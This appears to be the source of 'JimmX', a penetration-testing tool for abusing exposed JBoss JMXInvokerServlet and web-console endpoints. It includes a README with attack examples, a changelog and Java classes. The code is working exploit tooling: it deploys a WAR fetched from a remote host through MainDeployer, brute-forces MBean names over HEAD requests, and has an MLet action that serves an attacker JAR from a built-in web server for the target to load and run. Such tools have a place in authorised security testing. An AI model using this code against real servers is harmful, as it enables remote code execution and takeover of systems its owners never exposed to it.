README

-- Introduction ------------------------------------------------

 JimmX provides a good way to interact with the JMXInvokerServlet and
 EJBInvokerServlet servlets. 

 Supported JBoss AS version:
	- JBoss 4.x
	- JBoss 5.x

 JBoss 3.x and JBoss 6.x are not supported yet. 


-- Compilation -------------------------------------------------

 You can easily compile this tool with Ant. However, if you want to 
 prove that you are a Java Compilation Master Certified, I let you 
 find the suitable "javac" command yourself :]


-- Usage -------------------------------------------------------

 Usage: jimmix.sh [options] <operation> <mbean> <params>
 	-m, --method method		HTTP method
 	-t, --type type			Proxy type (default is jmxinvokerservlet)
 	-P, --proxy proxy		HTTP(S) proxy server.
 	-H, --host host			Host header
 	-U, --ua ua			User-Agent header (default is Mozilla/5.0)
 	-i, --invoker url		The JMX Invoker Servlet URL.
 	-u, --user user			Authentication username.
 	-p, --password password		Authentication password.
 	-s, --signature signature	The invocation signature, comma separated (default is java.lang.String).

 Several options are available:
 
  * method: useful to run JMX command through another HTTP method (
    HEAD, GET, etc.). The default is POST.

  * type: the remote JMX proxy (webconsole or jmxinvokerservlet)
 
  * proxy: intermediate HTTP(S) proxy (ex: 127.0.0.1:8080)

  * host: host header.

  * ua: user-agent to use. The default is "Mozilla/5.0".
 
  * invoker: the remove invoker URL.

  * user: the username to use when the invoker is authenticated.

  * password: the password to use when the invoker is authenticated.

  * signature: signature used to cast potential parameters for an
    operation

 Available operations:
  
  * createMBean: instanciate and register a mbean (only for jmxinvokerservlet)

  * get: get a mbean attribute

  * set: set a mbean attribute

  * invoke: invoke a mbean's method

  * queryNames: look for mbean objectnames (only for jmxinvokerservlet)

  * unregister: unregister a mbean (only for jmxinvokerservlet)

  * bfobjectname: bruteforce an objectname, useful when only HEAD
    is available (only for jmxinvokerservlet)


-- Examples ----------------------------------------------------

 * Get an attribute (like the OS version):

$ jimmix.sh -i http://jboss/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

 * Invoke a method:

$ jimmix.sh -i http://jboss/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://remote/appli.war

 * Looking for a mbean:

$ jimmix.sh -i http://jboss/invoker/JMXInvokerServlet queryNames jboss.classloader:*

 * Create a mbean

$ jimmix.sh -i http://target/invoker/JMXInvokerServlet \
  createMBean jboss.admin:service=DeploymentFileRepository \
  org.jboss.console.manager.DeploymentFileRepository \
  'jboss.classloader:id="vfsfile:/home/jboss/prod/server/default/deploy/management/console-mgr.sar/"'

 * Set an attribute:

$ jimmix.sh -i http://jboss/invoker/JMXInvokerServlet set jboss.admin:service=DeploymentFileRepository BaseDir ./deploy/management

 * Bruteforce an object name with HEAD HTTP request:

$ jimmix.sh -m HEAD -i http://target/invoker/JMXInvokerServlet bfobjectname \ 
  'jboss.classloader:id="vfsfile:/JIMMX/server/default/deploy/management/console-mgr.sar/"'

Put the word "JIMMX" where you want to bruteforce (however it must respects the objectname
structure: <domain>:<key>=<value>).


-- Contact -----------------------------------------------------

For questions, bug reports, ideas, contributions etc. please contact
renaud.dubourguais@synacktiv.com




CHANGELOG
version 0.3.2:
=============

- Support for using using MLet to create remote objects

version 0.3.1:
=============

- Support for 'set'ing attribute values

===========
FORKED
===========

version 0.3:
===========

- User agent support.
- Bug fixes reported by Thorgul.

version 0.2:
===========

Basic support for the web-console.

version 0.1:
===========

Public release.




src/core/jimmix/proxy/Proxy.java
package jimmix.proxy;

import java.util.Set;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.QueryExp;
import org.jboss.console.remote.RemoteMBeanAttributeInvocation;
import org.jboss.console.remote.RemoteMBeanInvocation;

public interface Proxy {

  	public String invoke(ObjectName name, String actionName, Object[] params, String[] signature) throws Exception;
  	public String get(ObjectName name, String attribute) throws Exception;
  	public void set(ObjectName name, String attribute, String value) throws Exception;
  	public ObjectInstance createMBean(String className, ObjectName name, ObjectName loaderName, Object[] params, String[] signature) throws Exception;
	  public void unregisterMBean(ObjectName name) throws Exception;
	  public Set<ObjectName> queryNames(ObjectName name, QueryExp query) throws Exception;
    public void mlet(ObjectName objectName, String serverUrl) throws Exception;

}


src/core/jimmix/action/MLetAction.java
package jimmix.action;

import javax.management.ObjectName;
import java.io.*;
import java.net.*;

import com.sun.net.httpserver.*;

import jimmix.util.TypeConvertor;
import jimmix.util.Log;
import jimmix.proxy.ProxyType;

public class MLetAction extends Action {

    private String objectName = null;
    private String hostingUrl = null;
    private String jarName = null;
    private String className = null;
    private boolean internalHttpServer = true;

    public MLetAction(String url, ProxyType type, String hostingUrl, String jarName, String className, boolean internalHttpServer) throws Exception {
        super(url, type);
        this.hostingUrl = hostingUrl;
        this.jarName = jarName;
        this.className = className;
        this.objectName = ":name=" + className;
        this.internalHttpServer = internalHttpServer;
    }

    public void invoke() throws Exception {
        Log.log("creating mbean " + this.objectName + " from " + this.className);
        HttpServer server = null;
        if (this.internalHttpServer) {
            Log.log("starting web server");
            int port = new URL(this.hostingUrl).getPort();
            if (port == -1) {
                port = 80;
            }
            server = HttpServer.create(new InetSocketAddress(port), 0);
            server.createContext("/", new RequestHandler(this.jarName, this.className, this.objectName, this.hostingUrl));
            server.setExecutor(null); // creates a default executor
            server.start();
        }

        try {
            this.proxy.mlet(new ObjectName(objectName), this.hostingUrl);
            Log.log("done");
        } catch (Exception e) {
            Log.error("something went wrong");
        }

        if (server != null) {
            server.stop(0);
        }
    }

    static class RequestHandler implements HttpHandler {

        private String jarName = null;
        private String className = null;
        private String objectName = null;
        private String url = null;

        public RequestHandler(String jarName, String className, String objectName, String url) {
            this.jarName = jarName;
            this.className = className;
            this.objectName = objectName;
            this.url = url;
        }

        public void handle(HttpExchange t) throws IOException {
            if (t.getRequestURI().getPath().contains(".jar")) {
                Log.log("request received for jar file");
                File file = new File(jarName);
                byte[] bytearray = new byte[(int) file.length()];
                FileInputStream fis = new FileInputStream(file);
                BufferedInputStream bis = new BufferedInputStream(fis);
                bis.read(bytearray, 0, bytearray.length);
                t.sendResponseHeaders(200, file.length());
                OutputStream os = t.getResponseBody();
                os.write(bytearray, 0, bytearray.length);
                os.close();
            } else {
                Log.log("request received for mlet entry");
                String archive = new File(jarName).getName();
                String response = String.format("<MLET CODE=%s ARCHIVE=%s NAME=%s CODEBASE=%s></MLET>", className, archive, objectName, url);
                Log.log("sending " + response);
                t.sendResponseHeaders(200, response.length());
                OutputStream os = t.getResponseBody();
                os.write(response.getBytes());
                os.close();
            }
        }
    }
}


src/core/jimmix/proxy/WebConsoleProxy.java
package jimmix.proxy;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.Set;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.QueryExp;
import org.jboss.console.remote.RemoteMBeanAttributeInvocation;
import org.jboss.console.remote.RemoteMBeanInvocation;
import org.jboss.console.remote.Util;

import jimmix.util.*;

public class WebConsoleProxy implements Proxy {

	private URL serverURL;

	public WebConsoleProxy(String serverURL) throws MalformedURLException {
		this.serverURL = new URL(serverURL);
	}

	public String invoke(ObjectName name, String actionName, Object[] params, String[] signature) throws Exception {
		String resultToString = "";
		RemoteMBeanInvocation mbeanInvocation = new RemoteMBeanInvocation(name, actionName, params, signature);
		Object result = Util.invoke(this.serverURL, mbeanInvocation);
		if(result != null) {
			resultToString = TypeConvertor.convertObjectToString(result, getObjectClass(result)) + "\n";
		}
		return resultToString;
	}

	public String get(ObjectName name, String attribute) throws Exception {
		String resultToString = "";
		RemoteMBeanAttributeInvocation mbeanInvocation = new RemoteMBeanAttributeInvocation(name, attribute);
		Object result = Util.getAttribute(this.serverURL, mbeanInvocation);
		if(result != null) {
			resultToString = TypeConvertor.convertObjectToString(result, getObjectClass(result)) + "\n";
		}
		return resultToString;
	}

	public void set(ObjectName name, String attribute, String value) throws Exception {
		throw new Exception("WebConsole set not implemented yet.");
	}

	public ObjectInstance createMBean(String className, ObjectName name, ObjectName loaderName, Object[] params, String[] signature) throws Exception {
		throw new Exception("WebConsole createMBean not implemented yet.");
	}

	public void unregisterMBean(ObjectName name) throws Exception {
		throw new Exception("WebConsole unregisterMBean not implemented yet.");
	}

	public Set<ObjectName> queryNames(ObjectName name, QueryExp query) throws Exception {
		throw new Exception("WebConsole queryNames not implemented yet.");
	}

	private String getObjectClass(Object object) {
		return object.getClass().toString().split(" ")[1];
	}

  public void mlet(ObjectName objectName, String serverUrl) throws Exception {
		throw new Exception("WebConsole mlet not implemented yet.");
  }
}



src/core/jimmix/proxy/JMXInvokerServletProxy.java
package jimmix.proxy;

import java.util.Set;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.Iterator;
import javax.management.MBeanServerConnection;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.QueryExp;
import javax.management.Attribute;

import org.jboss.console.remote.RemoteMBeanAttributeInvocation;
import org.jboss.console.remote.RemoteMBeanInvocation;
import org.jboss.invocation.http.interfaces.HttpInvokerProxy;
import org.jboss.invocation.Invoker;
import org.jboss.proxy.GenericProxyFactory;

import jimmix.util.*;

public class JMXInvokerServletProxy implements Proxy {

    private MBeanServerConnection mbeanServer;

    public JMXInvokerServletProxy(String url) throws Exception {
        Object cacheID = null;
        ObjectName targetName = new ObjectName("jboss.jmx:type=adaptor,name=Invoker");
        Invoker invoker = new HttpInvokerProxy(url);
        String jndiName = null;
        String proxyBindingName = null;

        // Building the interceptors list
        // These interceptors will be executed from the client side
        ArrayList interceptorClasses = new ArrayList();
        interceptorClasses.add(Class.forName("org.jboss.proxy.ClientMethodInterceptor"));
        interceptorClasses.add(Class.forName("org.jboss.proxy.SecurityInterceptor"));
        interceptorClasses.add(Class.forName("org.jboss.jmx.connector.invoker.client.InvokerAdaptorClientInterceptor"));
        interceptorClasses.add(Class.forName("org.jboss.invocation.InvokerInterceptor"));

        // Getting the current classloader
        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();

        // Building the exported interfaces list
        // The final proxy will implement these interfaces
        Class[] interfaces = new Class[]{
                Class.forName("org.jboss.jmx.adaptor.rmi.RMIAdaptorExt")
        };

        GenericProxyFactory proxyFactory = new GenericProxyFactory();
        MBeanServerConnection server = (MBeanServerConnection) proxyFactory.createProxy(
                cacheID,
                targetName,
                invoker,
                jndiName,
                proxyBindingName,
                interceptorClasses,
                classLoader,
                interfaces
        );

        this.mbeanServer = server;
        ;
    }

    public String invoke(ObjectName name, String actionName, Object[] params, String[] signature) throws Exception {
        String resultToString = "";
        Object result = mbeanServer.invoke(name, actionName, params, signature);
        if (result != null) {
            resultToString = TypeConvertor.convertObjectToString(result, TypeConvertor.getObjectClass(result));
        }
        return resultToString;
    }

    public String get(ObjectName name, String attribute) throws Exception {
        String resultToString = "";
        Object result = mbeanServer.getAttribute(name, attribute);
        if (result != null) {
            resultToString = TypeConvertor.convertObjectToString(result, TypeConvertor.getObjectClass(result));
        }
        return resultToString;
    }

    public void set(ObjectName name, String attribute, String value) throws Exception {
        mbeanServer.setAttribute(name, new Attribute(attribute, value));
    }

    public ObjectInstance createMBean(String className, ObjectName name, ObjectName loaderName, Object[] params, String[] signature) throws Exception {
        return mbeanServer.createMBean(className, name, loaderName, params, signature);
    }

    public void unregisterMBean(ObjectName name) throws Exception {
        mbeanServer.unregisterMBean(name);
    }

    public Set<ObjectName> queryNames(ObjectName name, QueryExp query) throws Exception {
        return mbeanServer.queryNames(name, query);
    }

    public void mlet(ObjectName objectName, String serverUrl) throws Exception {
        ObjectInstance bean;
        try {
            bean = mbeanServer.getObjectInstance(objectName);
            Log.log("mbean " + objectName + " already exists");
        } catch (Exception e) {
            // bean does not exist, try and create bean...
            Log.log("retrieving MLet instance");
            ObjectInstance mlet;
            try {
                mlet = mbeanServer.createMBean("javax.management.loading.MLet", null);
            } catch (javax.management.InstanceAlreadyExistsException iaee) {
                mlet = mbeanServer.getObjectInstance(new ObjectName(mbeanServer.getDefaultDomain() + ":type=MLet"));
            }

            Log.log("invoking MLet.getMBeansFromURL");
            Object result = mbeanServer.invoke(mlet.getObjectName(), "getMBeansFromURL", new Object[]{serverUrl}, new String[]{String.class.getName()});
            HashSet resultSet = ((HashSet) result);
            Iterator itr = resultSet.iterator();
            Object nextObject = itr.next();
            if (nextObject instanceof Exception) {
                throw ((Exception) nextObject);
            }
            bean = ((ObjectInstance) nextObject);
            Log.log("mbean " + objectName + " has been created");
        }
    }
}


src/core/jimmix/console/CommandLineParser.java
package jimmix.console;

import jargs.gnu.CmdLineParser;

import java.util.Hashtable;
import javax.management.MalformedObjectNameException;
import javax.management.ObjectName;
import javax.management.MalformedObjectNameException;

import org.jboss.console.remote.RemoteMBeanAttributeInvocation;
import org.jboss.console.remote.RemoteMBeanInvocation;

import java.util.regex.Pattern;
import java.util.regex.Matcher;
import java.util.Properties;

import org.jboss.security.SecurityAssociation;
import org.jboss.security.SimplePrincipal;
import org.jboss.console.manager.DeploymentFileRepository;

import jimmix.util.*;
import jimmix.proxy.*;
import jimmix.action.*;

public class CommandLineParser {
    // hashtable where parsed command is located
    private static Hashtable parsedCommand = new Hashtable();

    // internal command parser
    private static CmdLineParser parser = new CmdLineParser();
    private static CmdLineParser.Option helpOption;
    private static CmdLineParser.Option proxyOption;
    private static CmdLineParser.Option urlOption;
    private static CmdLineParser.Option userOption;
    private static CmdLineParser.Option passwordOption;
    private static CmdLineParser.Option methodOption;
    private static CmdLineParser.Option hostOption;
    private static CmdLineParser.Option uaOption;
    private static CmdLineParser.Option invokeSignatureOption;
    private static CmdLineParser.Option proxyTypeOption;

    public static Hashtable parseOptions(String args[]) throws Exception {

        helpOption = parser.addBooleanOption('h', "help");
        proxyOption = parser.addStringOption('P', "proxy");
        urlOption = parser.addStringOption('i', "invoker");
        userOption = parser.addStringOption('u', "user");
        passwordOption = parser.addStringOption('p', "password");
        methodOption = parser.addStringOption('m', "method");
        hostOption = parser.addStringOption('H', "host");
        uaOption = parser.addStringOption('U', "ua");
        invokeSignatureOption = parser.addStringOption('s', "signature");
        proxyTypeOption = parser.addStringOption('t', "type");

        try {
            parser.parse(args);
        } catch (CmdLineParser.OptionException e) {
            printParsingError(e.getMessage());
        }

        // help
        Boolean help = (Boolean) parser.getOptionValue(helpOption, Boolean.valueOf(false));
        if (help.booleanValue()) {
            printUsage();
            System.exit(1);
        }

        // setting the proxy
        String proxy = (String) parser.getOptionValue(proxyOption, null);
        if (proxy != null) {
            Pattern pattern = Pattern.compile("^([^:\\/\\s]+):([0-9]+)$", Pattern.CASE_INSENSITIVE);
            Matcher matcher = pattern.matcher(proxy);
            if (matcher.matches()) {
                String proxyHost = matcher.group(1);
                String proxyPort = matcher.group(2);

                System.setProperty("http.proxyHost", proxyHost);
                System.setProperty("http.proxyPort", proxyPort);
                System.setProperty("https.proxyHost", proxyHost);
                System.setProperty("https.proxyPort", proxyPort);
            } else {
                printParsingError("Proxy is not correctly defined (ex: host:port).");
            }
        }

        // setting the remote url
        String url = (String) parser.getOptionValue(urlOption, "http://localhost:8080/invoker/JMXInvokerServlet");
        parsedCommand.put("url", url);

        // configure user / password
        String user = (String) parser.getOptionValue(userOption, null);
        String password = (String) parser.getOptionValue(passwordOption, null);
        if (user != null && password != null) {
            SecurityAssociation.setPrincipal(new SimplePrincipal(user));
            SecurityAssociation.setCredential(password);
        }

        // setting the http method
        System.setProperty("jimmX.request.method", (String) parser.getOptionValue(methodOption, "POST"));

        // setting the proxy type
        String typestr = (String) parser.getOptionValue(proxyTypeOption, "jmxinvokerservlet");
        ProxyType type = null;
        if (typestr.equals("jmxinvokerservlet")) {
            type = ProxyType.JMX_INVOKER_SERVLET;
        } else if (typestr.equals("webconsole")) {
            type = ProxyType.WEB_CONSOLE;
        } else {
            printParsingError("Invalid proxy type \"" + type + "\". Expecting \"webconsole\" or \"jmxconsole\"");
        }

        // setting the host
        String host = (String) parser.getOptionValue(hostOption, null);
        if (host != null) {
            System.setProperty("jimmX.request.host", host);
        }

        // setting the useragent
        String ua = (String) parser.getOptionValue(uaOption, "Mozilla/5.0");
        if (ua != null) {
            System.setProperty("jimmX.request.user_agent", ua);
        }

        // create the action
        createAction(type);

        // return the command hash table
        return parsedCommand;
    }

    private static void createAction(ProxyType type) throws Exception {
        String[] args = parser.getRemainingArgs();
        if (args.length < 2) {
            printParsingError("Too few arguments.");
        }

        String action = args[0];
        String mbean = args[1];

        // invoke
        if (action.equals("invoke")) {
            if (args.length < 3) {
                printParsingError("Too few arguments.");
            }
            String invokeMethod = args[2];
            String invokeSignature = (String) parser.getOptionValue(invokeSignatureOption, null);

            Object[] invokeParamsArray = null;
            String[] invokeSignatureArray = null;

            if (args.length > 3) {
                String[] invokeParamsStringArray = new String[args.length - 3];
                System.arraycopy(args, 3, invokeParamsStringArray, 0, invokeParamsStringArray.length);

                // Default signature is java.lang.String
                if (invokeSignature == null) {
                    invokeSignatureArray = new String[invokeParamsStringArray.length];
                    for (int i = 0; i < invokeParamsStringArray.length; i++) {
                        invokeSignatureArray[i] = "java.lang.String";
                    }
                } else {
                    invokeSignatureArray = invokeSignature.split(",");
                }

                if (invokeSignatureArray.length != invokeParamsStringArray.length) {
                    System.err.println("Mismatch between parameters and signature.");
                    printUsage();
                    System.exit(2);
                }

                // Object conversion
                invokeParamsArray = TypeConvertor.convertObjectsFromString(invokeParamsStringArray, invokeSignatureArray);
            }
            parsedCommand.put("action", new InvokeAction((String) parsedCommand.get("url"), type, mbean, invokeMethod, invokeParamsArray, invokeSignatureArray));

            // get
        } else if (action.equals("get")) {
            // check arguments
            if (args.length != 3) {
                printParsingError("Invalid arguments.");
            }
            parsedCommand.put("action", new GetAction((String) parsedCommand.get("url"), type, mbean, args[2]));

            // set
        } else if (action.equals("set")) {
            // check arguments
            if (args.length != 4) {
                printParsingError("Invalid arguments.");
            }
            parsedCommand.put("action", new SetAction((String) parsedCommand.get("url"), type, mbean, args[2], args[3]));

            // createMBean
        } else if (action.equals("createMBean")) {
            if (args.length < 4) {
                printParsingError("Too few arguments.");
            }
            String className = args[2];
            String loaderName = args[3];
            String signatureRaw = (String) parser.getOptionValue(invokeSignatureOption, null);
            Object[] params = null;
            String[] signature = null;

            if (args.length > 4) {
                String[] paramsRaw = new String[args.length - 3];
                System.arraycopy(args, 3, paramsRaw, 0, paramsRaw.length);

                // Default signature is java.lang.String
                if (signatureRaw == null) {
                    signature = new String[paramsRaw.length];
                    for (int i = 0; i < paramsRaw.length; i++) {
                        signature[i] = "java.lang.String";
                    }
                } else {
                    signature = signatureRaw.split(",");
                }

                if (signature.length != paramsRaw.length) {
                    System.err.println("Mismatch between parameters and signature.");
                    printUsage();
                    System.exit(2);
                }

                // Object conversion
                params = TypeConvertor.convertObjectsFromString(paramsRaw, signature);
            }
            parsedCommand.put("action", new CreateMBeanAction((String) parsedCommand.get("url"), type, mbean, className, loaderName, params, signature));

            // mlet
        } else if (action.equals("mlet")) {
            if (args.length < 4) {
                printParsingError("Too few arguments.");
            }
            if (args.length > 5) {
                printParsingError("Too many arguments.");
            }
            String hostingUrl = args[1];
            String jarName = args[2];
            String className = args[3];
            boolean internalHttpServer = true;
            if (args.length == 5) {
                if (args[4].equalsIgnoreCase("false")) {
                    internalHttpServer = false;
                } else if (args[4].equalsIgnoreCase("true")) {
                    internalHttpServer = true;
                } else {
                    printParsingError("Unknown value: " + args[4]);
                }
            }

            parsedCommand.put("action", new MLetAction((String) parsedCommand.get("url"), type, hostingUrl, jarName, className, internalHttpServer));

            // unregisterMBean
        } else if (action.equals("unregisterMBean")) {
            parsedCommand.put("action", new UnregisterMBeanAction((String) parsedCommand.get("url"), type, mbean));

            // queryNames
        } else if (action.equals("queryNames")) {
            String query = null;
            if (args.length > 2) {
                query = args[2];
            }
            parsedCommand.put("action", new QueryNamesAction((String) parsedCommand.get("url"), type, mbean, query));

            // bfobjectname
        } else if (action.equals("bfobjectname")) {
            parsedCommand.put("action", new BruteforceObjectNameAction((String) parsedCommand.get("url"), type, mbean));

            // no match
        } else {
            printParsingError(action + " is not a valid action.");
        }
    }

    private static void printParsingError(String msg) {
        System.err.println(msg);
        printUsage();
        System.exit(2);
    }

    private static void printUsage() {
        System.err.println("\nUsage: jimmix.sh [options] <operation> <mbean> <params>\n" +
                "\t-m, --method method\t\tHTTP method\n" +
                "\t-t, --type type\t\t\tProxy type (default is jmxinvokerservlet)\n" +
                "\t-P, --proxy proxy\t\tHTTP(S) proxy server.\n" +
                "\t-H, --host host\t\t\tHost header\n" +
                "\t-U, --ua ua\t\t\tUser-Agent header (default is Mozilla/5.0)\n" +
                "\t-i, --invoker url\t\tThe JMX Invoker Servlet URL.\n" +
                "\t-u, --user user\t\t\tAuthentication username.\n" +
                "\t-p, --password password\t\tAuthentication password.\n" +
                "\t-s, --signature signature\tThe invocation signature, comma separated (default is java.lang.String).\n");
    }
}
